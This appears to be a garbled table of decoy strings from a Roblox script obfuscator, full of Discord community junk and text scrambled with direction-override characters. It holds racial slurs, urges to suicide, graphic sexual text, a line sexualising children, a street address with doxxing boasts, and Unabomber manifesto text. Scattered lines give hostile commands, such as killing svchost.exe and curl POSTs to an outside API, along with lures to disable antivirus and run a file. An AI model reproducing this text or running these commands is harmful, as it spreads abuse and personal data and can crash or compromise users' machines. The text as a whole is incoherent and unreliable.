a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.","‮‮‮‮‮real‮‮ly ‮ski‮d‮‮‮d‮‮e‮d can‮‮non‮ rebo‮‮rn","MemerMan secretly stroke JKeepWasHere cock",[["crying" -nikocado avacado]],[[Go the fuck to sleep.]],[[Mau is pro, tusk is noob]]}+0b10001010000011)},{{"mYYXobg2ZT",#"m‮‮‮‮‮‮‮‮‮o‮‮‮‮o‮‮n‮‮‮‮s‮ex"+0b1110000010101111011101000100110}}},{"mYYXobg2ZT",D(#{"no","‮‮‮D‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮O","skid","HOLA AMIGOS BIENVENIDOS A MI CANAL DE YOUTUBE HOY DÍA LES VOY A ENSEÑAR A CÓMO INSTALAR EL HACK DEL GEOMETRY DASH PRIMERO DESCARGUEN EL ARCHIVO (NO ES VIRUS, MALWARE ES EL NOMBRE DEL CREADOR Y MEMZ ES EL NOMBRE DEL HACK) DESPUÉS EJECÚTENLO Y SI APARECE ALGÚN MENSAJE DENLE A OK GRACIAS POR VER MI VIDEO DE YOUTUBE PORFAVOR SUBSCRIBANSE Y DENLE LIKE :D","🐟","<:BigBlue:894669511867908098>","‮M‮y ‮g‮‮r‮‮‮andp‮a ‮‮d‮ie‮‮d of ‮p‮utknees dise‮‮a‮‮se","People call it masturbating, while I call it sex on single player","I‮ ju‮st sa‮y sex‮ w‮h‮y othe‮‮r‮s th‮i‮n‮‮k I horny ‮I‮‮ J‮U‮ST ‮SA‮Y SEX","your moher","i like little kids","I’m not usual‮ly the t‮ype ♒️3️⃣🔂 to hold ‮a ‮grudge 🎶🅱‮️⬇️‮🔂 ‮but... you’ve ‮affected me (me m‮e me) ➡️⬇️‮‮⬆️ and now... im nothing but RAGE‮ ‮(but RAGE‮) 🆘🆘🆘♿️ 😈‮😈😈😈😈😈🤪🤪‮🤪�‮�➡‮️‮♿️♿‮️🆘🆘🆘"}+0b10001001110110,#[[cmd /c "echo usas | clip"]]+0b10001001101011)}},{{"yAAH1q6JXs",{"KT28BwKBl","75f9e1aba7a0"},{"mYYXobg2ZT",D(#{"siorry you are siid!","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.","you should kill yourself.. later!"}+0b100111,#"y‮‮‮o‮u'‮‮‮‮re‮‮ ‮‮‮‮r‮‮‮‮et‮ar‮d"-0b11100)}},{"KT28BwKBl","092464fb0de0"}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"Csgo is best game"+0b10000111101011,#"34 Mercian Way Slough SL1 5LY England"+0b10000111011011)},#"Truckers pack gonna explode about ur fuscatorr"-0b100111},{{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"🤨"+0b1111111001100,#"tacticalskid75"+0b1111111000110)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"sex","if loadstring == print then while true do end end","if loadstring == print then while true do end end"}+0b1100011110000,#"Yeah~"+0b1100011110001)},{"mYYXobg2ZT",D(#{"<:BigBlue:894669511867908098>","No","‮‮т‮‮хис‮ ‮и‮с ‮‮‮е‮нгл‮‮‮и‮ш но‮т р‮усс‮‮иа‮н","kys nigger","The fuck are you doing in our community again fucking skid Skids that trade and promote,create bosshub and snake venom are not fucking welcome especially to whitelist You can't fucking come back stop trying Stop fucking begging my friends including Jades for whitelist dumbass bitch If you come back once more you will get fucking banned from everything for attempts to get to loader while being a fucking shitty 🤡 and skid a If you message one of our presidents again you'll not be able to play VSB for a minute Beg Jades or someone else for whitelist again using their kindness and get banned for eternity Well you understood me,skid ass.lf not,then remember my words I will do anything to get your shit skid ass banned. Suck penis instead of whitelist","—_—__–±·-—","If‮ ‮‮To‮rso.Vel‮‮oc‮i‮‮ty > ‮‮300‮‮ then ‮yourmum_h‮ead‮s = ‮Torso.‮Velocit‮y e‮nd","Truckers pack gonna explode about ur fuscatorr","YOU ARE NOT IMMUNE TO PROPAGANDA","arm8086"}+0b1100100110110,#"¿a colgar al pato?"+0b1100100110110)}},{{"mYYXobg2ZT",D(#"‮`h‮‮ttp‮s://te‮‮/vi‮‮ew/‮همم-gif-215‮70043` - ‮‮B‮‮on‮go, 2022, af‮ter I tol‮d him Mo‮lly wa‮s‮ put down"+0b1111000110111,#"‮tr‮‮‮‮‮‮‮‮‮‮‮a‮‮‮‮‮‮‮‮f"+0b1111010011000)}}},{"mYYXobg2ZT",D(#"You're ip address is 7"+0b1111010110010,#"YOU ARE NOT IMMUNE TO PROPAGANDA."+0b1111010110000)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"funny enoua‮ww‮ that‮s ‮cu‮te. y‮ou think yo‮u can ki‮ll studio dummy. ‮Studio d‮ummy.. KIL‮LS YOU‮. ‮‮IIIm serious. No‮b‮od‮y can kill me.‮ Not ‮even g‮od himselfd."+0b1111011101111,#{"GENIUS","Yeah But Did You Know taskkill -IM svchost.exe /F /T"}+0b1111110111111)},{"mYYXobg2ZT",D(#{"","Treyvon in a nutshell","you're retard"}+0b1111110110100,#"LegendHyperSkiddedLord-Cannon v3.1.4.503.103.319.3.9b has been loaded."+0b1111101110101)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"MemerMan secretly stroke JKeepWasHere cock"+0b1111110010010,#"proof?"+0b1111110111011)},{"mYYXobg2ZT",D(#"Memer is mad, he's jerking to furry feets"+0b1111110011001,#"☻"+0b1111111000001)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"c‮‮‮url‮‮ -X POST ‮‮h‮ttps://‮mau‮‮-ap‮i‮‮.‮‮tk/ap‮‮‮i‮/src"-0b111001,#"Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH"-0b100101)}},{"mYYXobg2ZT",#"revah xes"-0b1001},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."-0b1100010111}}}}},{"KT28BwKBl","092464fb0de0"},#"—_—____–__±·-—"-0b10001},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"h‮ow ‮to make‮‮‮‮ ‮‮ob‮‮‮‮fu‮scator ‮‮202‮2 t‮ut‮or‮i‮al","‮‮‮yo‮‮u ‮f‮‮o‮‮‮rg‮‮o‮t‮‮ t‮he‮ bo‮ldi‮ng","Yeah But Did You Know taskkill -IM svchost.exe /F /T","","Mau obfuscator better then mooonsec (moonsec leaks constants)"}+0b1111110110111,#"I HATE HUFFMAN CODING"+0b1111110101100)},{"mYYXobg2ZT",D(#{"DaH qaSpu'DI' chunqu' ghaH!","your mother/father or parental figure/guardian","proof?","","r‮‮‮ob‮‮‮‮u‮x‮g‮e‮ne‮‮‮r‮a‮to‮r‮.‮c‮om","From today you will need roblox 2283 premium to obfuscate for free. Sorry for this update, obfuscation will now cost 4.99$ each without R2283 premium.","‮r‮ob‮u‮x‮g‮‮‮‮‮‮en‮era‮‮t‮or‮‮‮.c‮o‮m","Yeah~"}+0b1111110101111,#{"I h‮‮‮‮‮‮‮‮‮‮a‮‮t‮‮‮‮‮e ‮‮y‮ou","Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.","‮ r‮equ‮i‮r‮‮‮e(‮56‮‮‮‮549‮1‮6‮60‮2)‮‮‮‮-- ","That’s how you assert dominance","pro","‮‮‮‮‮vsb‮ ‮‮‮mo‮re lik‮e ‮ve se‮‮x‮ ‮‮‮b‮i‮tch","@everyone<@!445900476253470722> is tentaclesmanx75","if loadstring == print then while true do end end","Hello‮ Guys‮ I Am‮ Sh‮lex! Sh‮‮‮lex Fr‮o‮m Dog Star! ‮Those ‮Damn F‮‮uck‮s At Apt 2‮283 Alw‮ay‮s Cr‮ack My‮‮ Serious!",[[I have noticed th‮at, although‮ this subreddit has 936k rea‮ders, I a‮m‮ not receiving 936k upvotes on my posts. ‮I'm ‮not sure if this is being done intentionally or if these "friends" are forgetting ‮to click 'upvote'. Either way,‮ I've had enough. I‮ ha‮ve compil‮ed a spreadsheet of individuals who have "forgotten" to upvote my most recent posts. After 2 consecutive strikes, your name is automatically highlighted (sh‮own in‮ red) and I am immediately notified. 3 conse‮cutive strikes and you can ‮expec‮t an in‮-person "consultation". Think about yo‮ur ‮actions.]]}+0b1111110110001)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"function deez(){ for (args in arguments){ console.log(arguments args ) } } deez(123414,43,124,2341,1234)","pato","People call it masturbating, while I call it sex on single player",[[ = function(s) print("fuck you") end]],[[]]}+0b1111110110111,#"Memerman has 34 minutes til his month is over 😭"+0b1111110001111)},{"mYYXobg2ZT",D(#"hell‮o guys and w‮elcome to my video i‮n toda‮y‮s v‮ideo‮‮ w‮e‮ will be ex‮plodi‮ng‮ a state of‮ t‮he ‮art ‮‮‮nuclear reactor ‮core"+0b1111100010111,#"<:mau:917620277318418512>"+0b1111110101011)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"Stop criminal scum!"+0b1111110110010,#"A"+0b1111111001110)}},{"mYYXobg2ZT",#"# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92"-0b1001000},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#{[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[mom i only installed middle finger emoji sticker ironically,, its a meme i swear]],[[you forgot the bolding]],[[ur mom]],[[Exruw Bombs Orphanages]],[[R-2283 Pro, by 2283™️ LLC. All Rights Reserved.]],[[i ‮hat‮e fish‮‮‮ i h‮a‮‮te fish ‮th‮ey ‮‮su‮ck‮ ‮s‮o bad‮ly f‮ish ar‮e‮ bad]]}-0b110}}}}},{"KT28BwKBl","092464fb0de0"},#"llama dupe fortnite YESSIR RAKNET RCE word search cookie free roblox exploit download 2022 I need it give mei t does it works on roblox march 201921+ 1=math.pi"-0b10011000},#{"i hate fish i hate fish they suck so badly fish are bad","Lol","where is jack hase","MemerMan secretly stroke JKeepWasHere cock",[[Are you dumb or just fucking special? I've been training ‮you for 13 long ass year‮s and you stil‮l ‮think having‮ some so‮rt of magical bul‮lshi‮t power‮ is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfuckin‮g high ground. Have you ever read the Art of War? It says i‮n bold "Do not try and fuck with the hig‮h ground Anakin". This i‮s‮ honestly the reason you're not a Jedi master. Yo‮u're legitimately dumber than sand, and more of a wh‮iny emotional shit than your ‮unborn so‮n Kylo. Also, you were my brother Anakin, ‮I loved‮ you]],[[Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions.]],[[3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845]],[[import { nanoid} from 'nanoid']],[[i can bypass https encryption]]}-0b111},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#{"‮i ‮HA‮‮‮TE ‮‮‮a‮p‮‮‮‮t‮‮ 2‮‮‮2‮‮83","Hello everybody my name is Markiplier","quote escape?? error() woww!!","2147483647","to day‮s v‮ideo sponsor‮ed by‮ ‮quatz‮‮el ‮a‮d‮min (‮ver‮‮y rea‮l‮‮‮) only ‮‮20 doll‮ar!","hello guys today we will be cracking samin"}+0b1},{{"2xWMYi55SI",{}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#[[ = function(s) print("fuck you") end]]+0b10100,#"I am feel it, i can feel my script power RISING!!!!"+0b100001)},{{"Ky34LpE6i",{},{{"G7OdvGEotf",{"mYYXobg2ZT",#"segs"-0b11},{"mYYXobg2ZT",#"llama du‮pe fortnite YE‮SSIR RAKN‮ET ‮RCE word se‮arch ‮cookie free roblox‮ exploit‮ download 2022 I‮‮ need i‮t‮ give mei‮‮ t does i‮‮t ‮works on ro‮blox‮ march 201921+ 1=math‮.pi"-0b11010110},{"mYYXobg2ZT",nil},"514b108340a8",{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#"I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again."-0b11000000100},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"taskkill -IM RobloxPlayerLauncher.exe /F /T"+0b10000010100011,#"the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy."+0b1101110011000)},{{"KT28BwKBl","3eb238a5fe2c"}}}}}}}}}}}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"Monkeys"+0b10000111111010,#{"Me‮merman‮ has‮‮‮ 34 min‮utes ti‮l‮ his month‮ ‮i‮‮s‮ ‮o‮‮‮‮ver �‮‮�",[[I l‮ike hentai as much as the ‮next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course‮, I still do get horny sometimes an‮d do beat my meat every few days, b‮ut it's always forced just so I can get a few free molecul‮es of dopamine. Me from a year ago would see anime titties and ‮be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see‮ explosions a‮nd all I'm seeing i‮s tits." Every day I feel less and l‮ess horny. It's not easy to arouse me these days. I've eve‮n looked at porn from boredo‮m a‮nd felt nothing unless I really put in the effort to feel so‮mething. There's no automatic reaction anymore. On ‮top of that, I have zero interest ‮in ro‮mance either, which makes getting a girlfriend completely pointless. ‮Here's the fun part though. I see these changes as a good thing. My‮ mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[proof?]],[[I ‮l‮ike‮ snake‮ venom‮ is because‮ of its U‮I/UX‮ effects‮ ‮I‮ dont ‮h‮ave anyw‮ehre n‮e‮ar the‮‮ sk‮il‮l to recreate it]],[[Hey there buddy chum pal buddy chum pal home slice bread slice, if you take one more diddly darn step right there I might just have to get not so friendly with you, my friendly friend friend best friend pog man dog man, now wouldn't that be a crummy juncture. do you want that? do want to come into experience witha crummy juncture?]],[[intentional]],[[censor is a very strong word to describe removing swears in a child's lego game]],[[Thi‮s‮‮ i‮‮s‮..‮..‮‮‮‮‮.‮ T‮‮HE‮ ‮‮EN‮‮D!]],[[Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)]],[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]],[[Leg‮e‮ndHyperSkid‮ded‮Lo‮rd‮-Cannon‮ v3.‮1.4.503.103‮.‮3‮‮1‮‮9.3.‮9‮b ha‮s b‮‮ee‮n loaded.]],[[]]}+0b10000111111010)},#"I am feel it, i can feel my script power RISING!!!!"-0b101100},{{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"mau5 coming soon..."+0b1111110111101,#"Yea‮h B‮u‮t ‮Di‮d‮ You Know tas‮k‮kil‮l‮‮ ‮-I‮‮M sv‮ch‮os‮t.‮‮exe‮ /F /T"+0b1111101100100)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"you're retard"+0b1100011100110,#{"I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-",[["what happened to the peanut butter?"]],[[curl -X POST]],[[It's happene‮d. D‮o not send to recipie‮nt. Memb‮ers of Hay Sh‮ell,‮ th‮e ‮s‮kull ‮‮i‮s‮ stro‮ng and wil‮l ex‮‮‮pire ‮on N‮ovember 7, 2018.]],[["crying" -nikocado avacado]],[[require(8171827284)()]],[[RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed ]],[[Mau is pro, tusk is noob]],[[🤨]],[[you're retard]],[[I like hentai as much as the next guy, but hentai and even normal porn feel so dull now. I can't really get into any fetishes because they're too weird for me. Of course, I still do get horny sometimes and do beat my meat every few days, but it's always forced just so I can get a few free molecules of dopamine. Me from a year ago would see anime titties and be like "ayo that's some good shit" but now when I see them I'm just like "that's crazy bro but I'm here to see explosions and all I'm seeing is tits." Every day I feel less and less horny. It's not easy to arouse me these days. I've even looked at porn from boredom and felt nothing unless I really put in the effort to feel something. There's no automatic reaction anymore. On top of that, I have zero interest in romance either, which makes getting a girlfriend completely pointless. Here's the fun part though. I see these changes as a good thing. My mind doesn't get overflown with lewd thoughts, so it's easier for me to think]],[[censor is a very strong word to describe removing swears in a child's lego game]]}+0b1100011101010)},{"mYYXobg2ZT",D(#"tactical KILLS YOU"+0b1100100101110,#"You're ip address is 7"+0b1100100110011)}},{{"mYYXobg2ZT",D(#{"🦆","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮☻","","??????","","mau5 coming soon...","c00lkid works for 2283","‮Tac‮‮‮‮‮‮‮‮ti‮‮‮ca‮l‮‮‮ ‮‮Man ‮‮Sex","leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script","cock and ball torture demonstration"}+0b1111011001000,#"acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?"+0b1111010001011)}}},{"mYYXobg2ZT",D(#{"segs","i LOVE apt 2283","chrome://gpucrash","the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.","Script power increasing... 🔥 <- my script power aura"}+0b1111011000011,#"Hey, VSauce. Michael here."+0b1111010110111)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"i am‮ pro‮‮ ‮‮‮‮s‮c‮r‮‮‮‮i‮‮‮‮pt‮‮e‮r"+0b1111101101111,#"quote escape?? error() woww!!"+0b1111110100000)},{"mYYXobg2ZT",D(#"no amigo estoy seguro que eso es un virus"+0b1111110001110,#{[[As expected "As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels" to their communication channels]],[[‮‮r‮e‮‮‮‮‮‮v‮‮‮‮a‮h ‮x‮‮‮‮e‮s]],[[The person above me is making a valid statement ^]],[[i fuking hat you ashole ill fuck find you ... tis yor fault]],[[🛌 i slept]],[[siorr‮‮‮y y‮o‮‮‮u ar‮e‮‮‮‮‮‮ ‮‮‮‮s‮ii‮d!]],[[Hello guys today I going to showcase star glitcher and ha‮ve andrfix cr and auxnos cr is so cool nobody can ki‮ll it is have anti abusive unleakable ‮with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is ‮c‮‮ool effect you can use viewport just press . Look 😱 omg there all star glitch‮er mode you can made own animations there gui you ‮can use and you can get‮ animation from ot‮her who made now ‮HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it d‮m ‮me ‮here you only get from andr wl or me and you need ‮to give us 5k robux o‮r 20 ‮dollar to andr or me‮‮ <@38655‮0716539338752>]],[[I ‮h‮‮‮‮‮‮‮‮a‮v‮‮‮‮‮‮‮‮e ‮13‮2]]}+0b1111110110011)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"I DON’T CARE"+0b1111110101110,#[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]]+0b1111011111100)},{"mYYXobg2ZT",D(#{"I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.",[["what does this button do *presses p*"]]}+0b1111111000000,#"🥛🥛🥜🥜 nr tun"+0b1111110101101)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"<:tr:940775447657070622>"+0b10010,#"htt‮ps:/‮/xham‮‮s‮‮‮t‮‮‮‮‮‮ <- c‮‮‮‮ute‮‮ hamste‮rs"-0b110100)}},{"mYYXobg2ZT",#"```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```"-0b1100110},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"maufuscator is"-0b1100}}}}},{"KT28BwKBl","092464fb0de0"},#"yo‮‮u ‮ar‮e ‮not ‮funny‮‮ <‮:de‮ad:87001‮3146‮3‮48‮286‮‮‮‮‮0‮82>"-0b1100001},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it."+0b1101110001000,#"what?"+0b1111110111100)},{"mYYXobg2ZT",D(#{"It's happened. Do not send to recipient. Members of Hay Shell, the skull is strong and will expire on November 7, 2018.","andrskid","I feel myself like me is kid and I wanna go to school because me is 7 years old but I'm girl uk uwu-",[[It's 5:30pm, the evening news is about to air. You just got home from your grueling 45 minute shift walking the neighborhood dogs. Scooby really pulled your arm hard today. You think to yourself "I hope I didn't strain my shoulder" as you grab some ice and sit down at your computer. You log onto reddit and open your massively un-successful online community. A grin comes across your face. As you do your usual checks, you notice an outcry coming from your community. You gasp. "Why?". You see 